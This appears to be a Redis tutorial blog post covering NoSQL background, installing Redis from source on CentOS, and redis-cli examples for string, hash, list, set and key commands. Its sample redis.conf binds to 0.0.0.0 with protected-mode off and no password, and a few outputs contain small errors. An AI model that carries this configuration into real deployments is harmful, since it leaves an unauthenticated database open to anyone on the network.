Introduction to Redis and introduction to Redis deployment, principles and usage

Introduction to Redis and introduction to Redis deployment, principles and usage

[Chapter 1]-NoSQL background knowledge review

What is NoSQL

  • The most common explanation for NoSQL is "non-relational", and usually many people also say it is explained as "Not Only SQL"
  • NoSQL is just a concept, generally referring to non-relational databases
  • Different from relational databases, they do not guarantee the ACID properties of relational data
  • NoSQL is a brand-new revolutionary database movement that advocates the use of non-relational data storage. Compared with the overwhelming application of relational databases, this concept is undoubtedly an injection of new thinking.

Features of NoSQL

Application scenarios

  • Highly concurrent reading and writing
  • Massive data reading and writing
  • High scalability
  • high speed

Unsuitable application scenarios

  • Scenarios that require transaction support
  • SQL-based structured query storage, processing complex relationships and requiring ad hoc queries

Common NoSQL databases

memcache

  • NoSql database that appeared very early
  • The data is all in memory and generally not persisted.
  • Supports simple key-value mode
  • Generally, it is a database used as a cache database to assist persistence.

redis

  • Almost covers most of the functions of Memcached
  • The data is all in memory, supports persistence, and is mainly used for backup and recovery.
  • In addition to supporting simple key-value mode, it also supports the storage of multiple data structures, such as list, set, hash, zset, etc.
  • Generally, it is a database used as a cache database to assist persistence.
  • An in-memory database that is widely used and popular on the market today

mongoDB

  • High-performance, open source, schema free document database
  • The data is all in the memory. If the memory is insufficient, the less commonly used data is saved to the hard disk.
  • Although it is a key-value mode, it provides rich query functions for value (especially json)
  • Supports binary data and large objects
  • RDBMS can be replaced according to the characteristics of the data and become an independent database. Or cooperate with RDBMS to store specific data

HBase

  • Strong consistency read/write
    • HBASE is not an "eventually consistent" data store
    • It is well suited for tasks such as high-speed counter aggregation
  • Automatic chunking
    • HBase tables are distributed on the cluster through Regions. As data grows, regions are automatically split and redistributed.
  • Automatic RegionServer failover
  • Hadoop/HDFS integration
    • HBase supports HDFS out of the box as its distributed file system
  • MapReduce
    • HBase supports massively parallel processing via MapReduce, using HBase as source and sink
  • Operation management
    • HBase provides built-in web pages for business insights and JMX metrics

[Chapter 2]-Introduction to Redis

Introduction to Redis

Redis Chinese official website

Redis Chinese official website: http://www.redis.cn/

The official website can quickly check common commands, user manuals, community communication, download installation packages, etc.

Redis basic knowledge

  • Redis is one of the more popular NoSQL frameworks currently
  • It is an open source key-value storage system written in ANSI C language (different from MySQL's two-dimensional table storage)
  • Similar to Memcache, but it largely compensates for the shortcomings of Memcache. Redis data is cached in computer memory. The difference is that Memcache can only cache data in memory and cannot automatically and regularly write to the hard disk. This means that once Power outage or restart, memory cleared, data lost

Common business usage scenarios of Redis

Scenario 1: Get the latest N data

For example, to typically get the latest comments on a website article, you can put the latest 5,000 comment IDs in the Redis List collection, and get the parts beyond the collection from the database.

Scenario 2: Applied to various rankings to obtain TOP N operations

​The difference between this scenario and the above need to get the latest N data is that the previous operation uses time as the weight, and this TOP N is based on a certain condition as the weight, such as sorting by the number of likes, you can use Redis' sorted set , set the value to be sorted to the score of the sorted set, set the specific data to the corresponding value, and only need to execute one ZADD command each time.

Redis zadd, the command is used to add one or more member elements and their score values ​​to an ordered set (just understand it simply)

  • If a member is already a member of the ordered set, update the member's score and re-insert the member element to ensure that the member is in the correct position.
  • Fractional values ​​can be integer values ​​or double-precision floating point numbers.
  • If the sorted set key does not exist, create an empty sorted set and perform the zadd operation
  • When key exists but is not an ordered set type, an error is returned

Scenario 3: Applications that require precise expiration time settings

For example, you can set the score value of the sorted set mentioned in Scenario 2 above to the timestamp of the expiration time. Then you can simply sort by the expiration time and clear the expired data regularly. Not only does it clear the expired data in Redis, you can also You can think of the expiration time in Redis as an index of data in the database. Use Redis to find out which data needs to be expired and delete it, and then accurately delete the corresponding records from the database.

Scenario 4: Counter application

Redis commands are all atomic. You can easily use INCR and DECR commands to build a counter system.

Command:
incr key adds 1 to the value stored in key, and uses the final result as the return value;
decr key adds -1 to the value stored in key, and uses the final result as the return value;

Scenario 5: Uniq operation to obtain all data deduplication values ​​for a certain period of time

It is most suitable to use the set data structure of Redis. You only need to keep throwing data into the set. Set means collection, so it will be automatically deduplicated.

Scenario 6: Real-time system, anti-spam system

Through the set function mentioned in Scenario 5 above, the background can obtain whether an end user has performed a certain operation at this time, and can find the set of operations and perform analysis and statistical comparison.

Scenario 7: Caching

Store data directly into memory, with better performance than Memcached and more diverse data structures.

Features of Redis

  • Efficiency
    • The reading speed of Redis is 110,000 times/s and the writing speed is 81,000 times/s.
  • atomicity
    • All operations of Redis are atomic, and Redis also supports atomic execution of several operations after they are fully merged.
  • Supports multiple data structures
    • string
    • list
    • hash
    • set
    • zset (ordered set)
  • Stability: persistence, master-slave replication (cluster)
  • Other features: Support expiration time, support transactions, message subscription

To support transactions here, please note that redis transactions do not support complete acid transactions. Although redis provides transaction functions, redis transactions are not the same as relational database transactions. Redis transactions can only guarantee isolation and consistency. Atomicity and durability are not guaranteed.

[Chapter 3]-Redis stand-alone environment installation

All the various installation and deployment methods of redis are archived in "Redis Various Methods of Deployment" https://blog.csdn.net/wt334502157/article/details/123211953. If you just want to check the installation and deployment, you can refer to the installation and deployment article practice. This document is relatively large and focuses on the combing and sharing of all redis knowledge and the introduction of the development API. Of course, it also includes installation and deployment content.

Redis stand-alone environment linux installation and deployment

The official download address of the redis installation package

You can download any version at the official download address: http://download.redis.io/releases/

You can install the installation version as needed. The method and process are basically the same.

redis installation and deployment

[root@redis01 ~]# cat /etc/redhat-release 
CentOS Linux release 7.4.1708 (Core)
[root@redis01 ~]# mkdir -p /opt/software
[root@redis01 ~]# cd /opt/software
[root@redis01 software]# wget http://download.redis.io/releases/redis-3.2.8.tar.gz
[root@redis01 software]# tar -xf redis-3.2.8.tar.gz
[root@redis01 software]# ln -s redis-3.2.8 redis
[root@redis01 software]# ll
total 4
lrwxrwxrwx 1 root root   11 Sep 12 16:55 redis -> redis-3.2.8
drwxrwxr-x 6 root root 4096 Sep 12 16:52 redis-3.2.8
[root@redis01 redis]# cd redis
[root@redis01 redis]# make && make install
...
...
[root@redis01 redis]# mkdir /data
[root@redis01 redis]# mkdir -p /opt/software/redis/logs/
[root@redis01 redis]# vim redis.conf 
#常用需要更改的配置项:
daemonize yes  # 是否以守护进程启动
pidfile /opt/software/redis/redis_6379.pid   # 进程号文件的位置
port 6379    # 端口号
dir "/root/redis/data"  # 数据目录
logfile "/opt/software/redis/logs/6379.log"  # 日志位置及日志文件名
bind 0.0.0.0        # 0.0.0.0 可以远程访问
protected-mode no  # 保护模式

Start and shut down redis

# 启动redis
[root@redis01 redis]# /opt/software/redis/src/redis-server /opt/software/redis/redis.conf 
[root@redis01 redis]# 
[root@redis01 redis]# netstat -tnlpu|grep 6379
tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN      4475/redis-server 0 
[root@redis01 redis]# ps -ef | grep redis|grep -v grep 
root      4475     1  0 17:08 ?        00:00:00 /opt/software/redis/src/redis-server 0.0.0.0:6379
# 关闭redis
[root@redis01 redis]# src/redis-cli -h 127.0.0.1 shutdown
[root@redis01 redis]# netstat -tnlpu|grep 6379
[root@redis01 redis]# ps -ef | grep redis|grep -v grep 
[root@redis01 redis]# 
# 此时redis已经被关闭,再次启动redis
[root@redis01 redis]# /opt/software/redis/src/redis-server /opt/software/redis/redis.conf

Connect redis

# -h指定redis的服务ip地址,不加默认本地localhost
[root@redis01 redis]# src/redis-cli -h 39.101.78.174
39.101.78.174:6379> 
# 当输入ping命令时,如果redis可以返回PONG,则连接正常
39.101.78.174:6379> ping
PONG

[Chapter 4]-Introduction to Redis data types

The five most commonly used data types in Redis

Type 1: String string operations

1. Set the value of the specified key

  • SET key value
39.101.78.174:6379> SET hello world
OK

2. Get the value of the specified key

  • GET key
39.101.78.174:6379> GET hello
"world"

3. Set the value of the given key to value and return the old value of the key

  • GETSET key value
39.101.78.174:6379> GETSET hello newworld
"world"
39.101.78.174:6379> GET hello
"newworld"

4. Get the values ​​of all (one or more) given keys

  • MGET key1 key2 [key3…]
39.101.78.174:6379> SET k1 v1
OK
39.101.78.174:6379> SET k2 v2
OK
39.101.78.174:6379> SET k3 v3
OK
39.101.78.174:6379> MGET k1 k2 k3
1) "v1"
2) "v2"
3) "v3"
39.101.78.174:6379> 

5. Associate the value value to the key and set the expiration time of the key to seconds (in seconds)

  • SETEX key seconds value
39.101.78.174:6379> SETEX hello 10 world3
OK
39.101.78.174:6379> get hello
"world3"
# 等待超过10秒后再次查询
39.101.78.174:6379> get hello
(nil)
39.101.78.174:6379> 

6. Only set the value of key when the key does not exist

  • SETNX key value
39.101.78.174:6379> GET k3
"v3"
39.101.78.174:6379> SETNX k3 v33
(integer) 0
# k3已有v3的值所以设置失败
39.101.78.174:6379> GET k3
"v3"
39.101.78.174:6379> SETNX k4 v4
(integer) 1
39.101.78.174:6379> GET k4
"v4"
39.101.78.174:6379> SETNX k4 v44
(integer) 0
39.101.78.174:6379> GET k4
"v4"
39.101.78.174:6379> 

7. Return the length of the string value stored in key

  • STRLEN key
39.101.78.174:6379> SET a a
OK
39.101.78.174:6379> SET bb bb
OK
39.101.78.174:6379> SET ccc ccc
OK
39.101.78.174:6379> SET dddd dddd
OK
39.101.78.174:6379> STRLEN a
(integer) 1
39.101.78.174:6379> STRLEN bb
(integer) 2
39.101.78.174:6379> STRLEN ccc
(integer) 3
39.101.78.174:6379> STRLEN dddd
(integer) 4
39.101.78.174:6379> STRLEN k1
(integer) 2
39.101.78.174:6379> STRLEN k2
(integer) 2

8. Set one or more key-value pairs at the same time

  • MSET key value [key value …]
39.101.78.174:6379> MSET k5 v5 k6 v6 k7 v7
OK
39.101.78.174:6379> GET k5
"v5"
39.101.78.174:6379> GET k6
"v6"
39.101.78.174:6379> GET k7
"v7"
39.101.78.174:6379> 

9. Set one or more key-value pairs at the same time, if and only if all given keys do not exist

  • MSETNX key value [key value …]
39.101.78.174:6379> MSETNX k7 v7 k8 v8 k9 v9 k10 v10
(integer) 0
# 因为k7-k10中,k7已经存在,所以设置失败
39.101.78.174:6379> GET k8
(nil)
39.101.78.174:6379> MSETNX k8 v8 k9 v9 k10 v10
(integer) 1
39.101.78.174:6379> GET k8
"v8"
39.101.78.174:6379> 

10.PSETEX command, this command is similar to the SETEX command, but it sets the key's survival time in milliseconds instead of seconds like the SETEX command.

  • PSETEX key milliseconds value
39.101.78.174:6379> PSETEX k11 10000 v11
OK
39.101.78.174:6379> GET k11
"v11"
39.101.78.174:6379> GET k11
(nil)
39.101.78.174:6379> 

11. Increase the numerical value stored in key by one

  • INCR key
39.101.78.174:6379> SET tps 1
OK
39.101.78.174:6379> GET tps
"1"
39.101.78.174:6379> INCR tps
(integer) 2
39.101.78.174:6379> GET tps
"2"
39.101.78.174:6379> INCR tps
(integer) 3
39.101.78.174:6379> GET tps
"3"
39.101.78.174:6379> 

12. Add the given increment to the value stored in the key

  • INCRBY key increment
39.101.78.174:6379> GET tps
"3"
39.101.78.174:6379> INCRBY tps 10
(integer) 13
39.101.78.174:6379> GET tps
"13"
39.101.78.174:6379> INCRBY tps 2
(integer) 15
39.101.78.174:6379> GET tps
"15"
39.101.78.174:6379> 

13. Add the value stored in key to the given floating point increment value (increment)

  • INCRBYFLOAT key increment
39.101.78.174:6379> SET score 50
OK
39.101.78.174:6379> GET score
"50"
39.101.78.174:6379> INCRBYFLOAT score 0.5
"50.5"
39.101.78.174:6379> GET score
"50.5"
39.101.78.174:6379> INCRBYFLOAT score 7.5
"58"
39.101.78.174:6379> GET score
"58"
39.101.78.174:6379> INCRBYFLOAT score 1
"59"
39.101.78.174:6379> GET score
"59"
# 对比INCRBY
39.101.78.174:6379> INCRBY score 1
(integer) 60
39.101.78.174:6379> GET score
"60"
39.101.78.174:6379> INCRBY score 0.5
(error) ERR value is not an integer or out of range
39.101.78.174:6379> GET score
"60"
39.101.78.174:6379> 

14. Decrement the numerical value stored in key by one.

  • DECR key
39.101.78.174:6379> GET tps
"15"
39.101.78.174:6379> DECR tps
(integer) 14
39.101.78.174:6379> GET tps
"14"
39.101.78.174:6379> DECR tps
(integer) 13
39.101.78.174:6379> GET tps
"13"

15.The value stored in key minus the given decrement value (decrement)

  • DECRBY key decrement
39.101.78.174:6379> GET tps
"13"
39.101.78.174:6379> DECRBY tps 3
(integer) 10
39.101.78.174:6379> GET tps
"10"
39.101.78.174:6379> DECRBY tps 2
(integer) 8
39.101.78.174:6379> GET tps
"8"
# 可以传负数
39.101.78.174:6379> DECRBY tps -1
(integer) 9
39.101.78.174:6379> GET tps
"9"
# 对比DECR则报错
39.101.78.174:6379> DECR tps 2
(error) ERR wrong number of arguments for 'decr' command
39.101.78.174:6379> 

16.APPEND command, if the key already exists and is a string, the APPEND command will append the specified value to the end of the original value of the key.

  • APPEND key value
39.101.78.174:6379> SET wang t
OK
39.101.78.174:6379> GET wang
"t"
39.101.78.174:6379> APPEND wang i
(integer) 2
39.101.78.174:6379> GET wang
"ti"
39.101.78.174:6379> APPEND wang n
(integer) 3
39.101.78.174:6379> GET wang
"tin"
39.101.78.174:6379> APPEND wang g
(integer) 4
39.101.78.174:6379> GET wang
"ting"
39.101.78.174:6379> 
39.101.78.174:6379> APPEND wang _
(integer) 5
39.101.78.174:6379> GET wang
"ting_"
39.101.78.174:6379> APPEND wang 666
(integer) 8
39.101.78.174:6379> GET wang
"ting_666"
39.101.78.174:6379> 

Type 2: hash list operation

Redis hash is a mapping table of string type fields and values. Hash is particularly suitable for storing objects.

Each hash in Redis can store 2 32 - 1 key-value pairs

1. Set the value of the field field in the hash table key to value

  • HSET key field value
39.101.78.174:6379> HSET key1 field1 value1
(integer) 1
39.101.78.174:6379> HGET key1 field1
"value1"
39.101.78.174:6379> 

2. Set the value of the hash table field only when the field field does not exist.

  • HSETNX key field value
127.0.0.1:6379> HGET key1 field1
"value1"
127.0.0.1:6379> HSETNX key1 field1 value2
(integer) 0
127.0.0.1:6379> HGET key1 field1
"value1"
127.0.0.1:6379> HSETNX key1 field2 value2
(integer) 1
127.0.0.1:6379> HGET key1 field2
"value2"
127.0.0.1:6379> 

3. Set multiple field-value pairs to the hash table key at the same time

  • HMSET key field1 value1 [field2 value2 …]
127.0.0.1:6379> HMSET key1 field3 value3 field4 value4 field5 value5
OK
127.0.0.1:6379> HGET key1 field3
"value3"
127.0.0.1:6379> HGET key1 field4
"value4"
127.0.0.1:6379> HGET key1 field5
"value5"
127.0.0.1:6379> 

4. Check whether the specified field exists in the hash table key

  • HEXISTS key field
127.0.0.1:6379> HEXISTS key1 field1
(integer) 1
127.0.0.1:6379> HEXISTS key1 field2
(integer) 1
127.0.0.1:6379> HEXISTS key1 field100
(integer) 0
127.0.0.1:6379> 

5. Get all fields and values ​​of the specified key in the hash table

  • HGETALL key
127.0.0.1:6379> HGETALL key1
 1) "field1"
 2) "value1"
 3) "field2"
 4) "value2"
 5) "field3"
 6) "value3"
 7) "field4"
 8) "value4"
 9) "field5"
10) "value5"
127.0.0.1:6379> 

6. Get all fields in the hash table

  • HKEY key
127.0.0.1:6379> HKEYS key1
1) "field1"
2) "field2"
3) "field3"
4) "field4"
5) "field5"
127.0.0.1:6379> 

7. Get the number of fields in the hash table

  • HLEN key
127.0.0.1:6379> HLEN key1
(integer) 5
127.0.0.1:6379> HSET key1 field6 value6
(integer) 1
127.0.0.1:6379> HLEN key1
(integer) 6
127.0.0.1:6379> 

8. Get the values ​​of all given fields

  • HMGET key field1 field2 …
127.0.0.1:6379> HMGET key1 field1 field3 field5
1) "value1"
2) "value3"
3) "value5"
127.0.0.1:6379> 

9. Add increment to the integer value of the specified field in the hash table key

  • HINCRBY key field increment
127.0.0.1:6379> HSET key2 field1 100
(integer) 1
127.0.0.1:6379> HGET key2 field1
"100"
127.0.0.1:6379> HINCRBY key2 field1 2
(integer) 102
127.0.0.1:6379> HINCRBY key2 field1 2
(integer) 104
127.0.0.1:6379> HGET key2 field1
"104"
127.0.0.1:6379> 

10. Add increment to the floating point value of the specified field in the hash table key

  • HINCRBYFLOAT key field increment
127.0.0.1:6379> HGET key2 field1
"104"
127.0.0.1:6379> HINCRBYFLOAT key2 field1 0.01
"104.01"
127.0.0.1:6379> HGET key2 field1
"104.01"
127.0.0.1:6379> HINCRBYFLOAT key2 field1 10.1
"114.11"
127.0.0.1:6379> HGET key2 field1
"114.11"
127.0.0.1:6379> 

11. Get all values ​​in the hash table

  • HVALS key
127.0.0.1:6379> HVALS key1
1) "value1"
2) "value2"
3) "value3"
4) "value4"
5) "value5"
6) "value6"
127.0.0.1:6379> HVALS key2
1) "114.11"
127.0.0.1:6379> 

12. Delete one or more hash table fields

  • HDEL key field1 field2 …
127.0.0.1:6379> HKEYS key1
1) "field1"
2) "field2"
3) "field3"
4) "field4"
5) "field5"
6) "field6"
127.0.0.1:6379> HDEL key1 field1 field3
(integer) 2
127.0.0.1:6379> HKEYS key1
1) "field2"
2) "field4"
3) "field5"
4) "field6"
127.0.0.1:6379> HVALS key1
1) "value2"
2) "value4"
3) "value5"
4) "value6"
127.0.0.1:6379> 

Type 3: list list operation

A Redis list is a simple list of strings, sorted in insertion order. You can add an element to the head (left) or tail (right) of the list

A list can contain at most 2 32 - 1 elements (4294967295, over 4 billion elements per list)

1. Insert one or more values ​​into the head of the list

  • LPUSH key value1 value2 …
127.0.0.1:6379> LPUSH l1 v1 v2 v3
(integer) 3

2. View all data in the list

  • LRANGE key start stop
127.0.0.1:6379> LRANGE l1 0 100
1) "v3"
2) "v2"
3) "v1"
127.0.0.1:6379> LRANGE l1 0 1
1) "v3"
2) "v2"
127.0.0.1:6379> LRANGE l1 0 2
1) "v3"
2) "v2"
3) "v1"
127.0.0.1:6379> LRANGE l1 0 0
1) "v3"
127.0.0.1:6379> LRANGE l1 -10 2
1) "v3"
2) "v2"
3) "v1"
127.0.0.1:6379> 
# 0 -1 所有数据
127.0.0.1:6379> LRANGE l1 0 -1
1) "v3"
2) "v2"
3) "v1"

3. Insert a value into the head of an existing list

  • LPUSH key value
127.0.0.1:6379> LRANGE l1 0 -1
1) "v3"
2) "v2"
3) "v1"
127.0.0.1:6379> LPUSH l1 V4
(integer) 4
127.0.0.1:6379> LRANGE l1 0 -1
1) "V4"
2) "v3"
3) "v2"
4) "v1"
127.0.0.1:6379> LINDEX l1 0
"V4"
127.0.0.1:6379> 

4. Add one or more values ​​to the end of the list

  • RPUSH key value1 value2 …
127.0.0.1:6379> RPUSH l1 v5 v6 v7 v8
(integer) 8
127.0.0.1:6379> LRANGE l1 0 -1
1) "V4"
2) "v3"
3) "v2"
4) "v1"
5) "v5"
6) "v6"
7) "v7"
8) "v8"
127.0.0.1:6379> 

5. Add a single value to the end of an existing list

  • RPUSH key value
127.0.0.1:6379> RPUSH l1 v9
(integer) 9
127.0.0.1:6379> LRANGE l1 0 -1
1) "V4"
2) "v3"
3) "v2"
4) "v1"
5) "v5"
6) "v6"
7) "v7"
8) "v8"
9) "v9"
127.0.0.1:6379> 

6. Insert elements before or after the elements in the list

  • LINSERT key BEFORE|AFTER pivot value
127.0.0.1:6379> LINSERT l1 BEFORE v5 before_v5
(integer) 10
127.0.0.1:6379> LINSERT l1 AFTER v7 after_v7
(integer) 11
127.0.0.1:6379> LRANGE l1 0 -1
 1) "V4"
 2) "v3"
 3) "v2"
 4) "v1"
 5) "before_v5"
 6) "v5"
 7) "v6"
 8) "v7"
 9) "after_v7"
10) "v8"
11) "v9"
127.0.0.1:6379> 

7. Get elements in the list by index

  • LINDEX key index
127.0.0.1:6379> LINDEX l1 0
"V4"
127.0.0.1:6379> LINDEX l1 8
"after_v7"
127.0.0.1:6379> 

8. Set the value of a list element by index

  • LSET key index value
127.0.0.1:6379> LINDEX l1 5
"v5"
127.0.0.1:6379> LSET l1 5 v555
OK
127.0.0.1:6379> LINDEX l1 5
"v555"

9. Get the length of the list

  • LLEN key
127.0.0.1:6379> LLEN l1
(integer) 11

10. Remove and get the first element of the list

  • LPOP key
127.0.0.1:6379> LRANGE l1 0 -1
 1) "V4"
 2) "v3"
 3) "v2"
 4) "v1"
 5) "before_v5"
 6) "v5"
 7) "v6"
 8) "v7"
 9) "after_v7"
10) "v8"
11) "v9"
127.0.0.1:6379> LINDEX l1 0
"V4"
127.0.0.1:6379> LPOP l1
"V4"

11. Remove the last element of the list and the return value is the removed element

  • RPOP key
127.0.0.1:6379> LRANGE l1 0 -1
1) "v3"
2) "v2"
3) "v1"
4) "before_v5"
5) "v555"
6) "v6"
7) "v7"
8) "after_v7"
9) "v8"
10) "v9"
127.0.0.1:6379> RPOP l1
"V9"

12. Remove and get the first element of the list. If there is no element in the list, the list will be blocked until the wait times out or a pop-up element is found.

  • BLPOP key1 [key2 ] timeout
127.0.0.1:6379> LRANGE l1 0 -1
1) "v3"
2) "v2"
3) "v1"
4) "before_v5"
5) "v555"
6) "v6"
7) "v7"
8) "after_v7"
9) "v8"
127.0.0.1:6379> BLPOP l1 2000
1) "l1"
2) "v3"
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
6) "v7"
7) "after_v7"
8) "v8"

13. Remove and get the last element of the list. If there is no element in the list, the list will be blocked until the wait times out or a pop-up element is found.

  • BRPOP key1 [key2 ] timeout
127.0.0.1:6379> BRPOP l1 2000
1) "l1"
2) "v8"

14. Remove the last element of the list and add that element to another list and return

  • RPOPLPUSH source destination
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
6) "v7"
7) "after_v7"
127.0.0.1:6379> LRANGE l2 0 -1
(empty list or set)
127.0.0.1:6379> RPOPLPUSH l1 l2
"after_v7"
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
6) "v7"
127.0.0.1:6379> LRANGE l2 0 -1
1) "after_v7"

15. Pop a value from the list, insert the popped element into another list and return it; if the list has no elements, the list will be blocked until the wait times out or a pop-up element is found.

  • BRPOPLPUSH source destination timeout
127.0.0.1:6379> BRPOPLPUSH l1 l2 2000
"v7"
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
127.0.0.1:6379> LRANGE l2 0 -1
1) "v7"
2) "after_v7"

16. Trim a list so that only the elements within the specified range are retained in the list, and the elements that are not within the specified range will be deleted.

  • LTRIM key start stop
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
127.0.0.1:6379> LTRIM l1 0 2
OK
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"

17. Delete the list of specified keys

  • DEL key
127.0.0.1:6379> DEL l2
(integer) 1
127.0.0.1:6379> LRANGE l2 0 -1
(empty list or set)

Type 4: set unordered set operation

  • Redis Set is an unordered collection of String type . Set members are unique, which means that duplicate data cannot appear in the set
  • Collections in Redis are implemented through hash tables, so the complexity of adding, deleting, and searching is all 0(1).
  • The maximum number of members in the set is 2 32 - 1

1. Add one or more members to the collection

  • SADD key member1 member1 …
127.0.0.1:6379> SADD set1 v1 v2
(integer) 2

2. Return all members in the collection

  • SMEMBERS key
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"

3. Get the number of members of the collection

  • SCARD key
127.0.0.1:6379> SCARD set1
(integer) 2
127.0.0.1:6379> SADD set1 v3
(integer) 1
127.0.0.1:6379> SCARD set1
(integer) 3

4. Return the difference set of all given sets

  • SDIFF key1 key2 …
127.0.0.1:6379> SADD set2 v1 v3 v4
(integer) 3
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SMEMBERS set2
1) "v4"
2) "v1"
3) "v3"
127.0.0.1:6379> SDIFF set1 set2
1) "v2"

5. Return the difference set of all given sets and store it in destination

  • SDIFFSTORE destination key1 key2 …
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SMEMBERS set2
1) "v4"
2) "v1"
3) "v3"
127.0.0.1:6379> SMEMBERS set3
(empty list or set)
127.0.0.1:6379> SDIFFSTORE set3 set1 set2
(integer) 1
127.0.0.1:6379> SMEMBERS set3
1) "v2"

6. Return the intersection of all given sets

  • SINTER key1 key2 …
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SMEMBERS set2
1) "v4"
2) "v1"
3) "v3"
127.0.0.1:6379> SINTER set1 set2
1) "v1"
2) "v3"

7. Return the intersection of all given sets and store it in destination

  • SINTERSTORE destination key1 key2 …
127.0.0.1:6379> SINTERSTORE set4 set1 set2
(integer) 2
127.0.0.1:6379> SMEMBERS set4
1) "v1"
2) "v3"

8. Determine whether the member element is a member of the set key

  • SISMEMBER key member
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SISMEMBER set1 v1
(integer) 1
127.0.0.1:6379> SISMEMBER set1 v4
(integer) 0

9. Move the member element from the source collection to the destination collection

  • SMOVE source destination member
127.0.0.1:6379> SMEMBERS set3
1) "v2"
127.0.0.1:6379> SMEMBERS set4
1) "v1"
2) "v3"
127.0.0.1:6379> SMOVE set3 set4 v2
(integer) 1
127.0.0.1:6379> SMEMBERS set4
1) "v2"
2) "v1"
3) "v3"

10. Remove and return a random element from the collection

  • SPOP key
127.0.0.1:6379> SMEMBERS set2
1) "v4"
2) "v1"
3) "v3"
127.0.0.1:6379> SPOP set2
"v4"
127.0.0.1:6379> SPOP set2
"v1"
127.0.0.1:6379> SMEMBERS set2
1) "v3"

11. Return one or more random numbers in the collection

  • SRANDMEMBER key [count]
127.0.0.1:6379> SRANDMEMBER set1
"v3"
127.0.0.1:6379> SRANDMEMBER set1 2
1) "v1"
2) "v3"
127.0.0.1:6379> SRANDMEMBER set1 2
1) "v2"
2) "v1"

12. Remove one or more members from the collection

  • SREM key member1 [member2 …]
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SREM set1 v1 v2
(integer) 2
127.0.0.1:6379> SMEMBERS set1
1) "v3"

13.Return the union of all given sets

  • SUNION key1 [key2]
127.0.0.1:6379> SADD set1 v5 v6 v7
(integer) 3
127.0.0.1:6379> SMEMBERS set1
1) "v7"
2) "v5"
3) "v6"
4) "v3"
127.0.0.1:6379> SADD set2 v8 v9 
(integer) 2
127.0.0.1:6379> SMEMBERS set2
1) "v9"
2) "v8"
3) "v3"
127.0.0.1:6379> SUNION set1 set2
1) "v3"
2) "v5"
3) "v6"
4) "v9"
5) "v7"
6) "v8"

14.The union of all given collections is stored in the destination collection

  • SUNIONSTORE destination key1 [key2]
127.0.0.1:6379> SUNIONSTORE set5 set1 set2
(integer) 6
127.0.0.1:6379> SMEMBERS set5
1) "v3"
2) "v5"
3) "v6"
4) "v9"
5) "v7"
6) "v8"

Operations on keys

1.DEL delete key, this command is used to delete the key when the key exists

  • DEL key
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "key2"
7) "key1"
8) "l1"
127.0.0.1:6379> DEL key1 key2
(integer) 2
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "l1"

2. Serialize the given key and return the serialized value

  • DUMP key
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> DUMP k1
"\x00\x02v1\a\x00\xa0\xd7e\xad\xc3\x9a\xacA"

3. Check whether the given key exists

  • EXISTS key
127.0.0.1:6379> EXISTS k1
(integer) 1
127.0.0.1:6379> EXISTS k100
(integer) 0

4. Set the expiration time for the given key, in seconds

  • EXPIRE key seconds
127.0.0.1:6379> EXPIRE k1 8
(integer) 1
127.0.0.1:6379> EXISTS k1
(integer) 1
# 等待超过8秒后查询
127.0.0.1:6379> EXISTS k1
(integer) 0
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "l1"

5. Set the expiration time of the key in milliseconds

  • PEXPIRE key milliseconds
127.0.0.1:6379> SET k2 v2
OK
127.0.0.1:6379> PEXPIRE k2 3000
(integer) 1
127.0.0.1:6379> GET k2
"v2"
#  等待超过3秒后查询
127.0.0.1:6379> GET k2
(nil)

6. Find all keys that match the given pattern (pattern)

  • KEYS pattern
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "l1"
127.0.0.1:6379> keys set*
1) "set1"
2) "set5"
3) "set4"
4) "set2"
127.0.0.1:6379> keys *1
1) "L1"
2) "set1"
3) "l1"

7. Remove the expiration time of the key and the key will be maintained permanently.

  • PERSIST key
127.0.0.1:6379> SET k1 v1
OK
127.0.0.1:6379> EXPIRE k1 15
(integer) 1
# 在过期之前执行PERSIST解除过期
127.0.0.1:6379> PERSIST k1
(integer) 1
# 等待超过15秒后查询依然可以查询到
127.0.0.1:6379> GET k1
"v1"

8. Return the remaining expiration time of the key in milliseconds

  • PTTL key
127.0.0.1:6379> EXPIRE k1 30
(integer) 1
127.0.0.1:6379> PTTL k1
(integer) 23007
127.0.0.1:6379> PTTL k1
(integer) 17000

9. Return the remaining survival time of the given key in seconds.

  • TTL key
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> EXPIRE k1 30
(integer) 1
127.0.0.1:6379> TTL k1
(integer) 24
127.0.0.1:6379> TTL k1
(integer) 17

10. Randomly return a key from the current database

  • RANDOMKEY
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "l1"
127.0.0.1:6379> RANDOMKEY
"l1"
127.0.0.1:6379> RANDOMKEY
"set1"
127.0.0.1:6379> RANDOMKEY
"set4"

11. Modify the name of the key

  • RENAME key newkey
127.0.0.1:6379> SET k1 v1
OK
127.0.0.1:6379> GET k1
"v1"
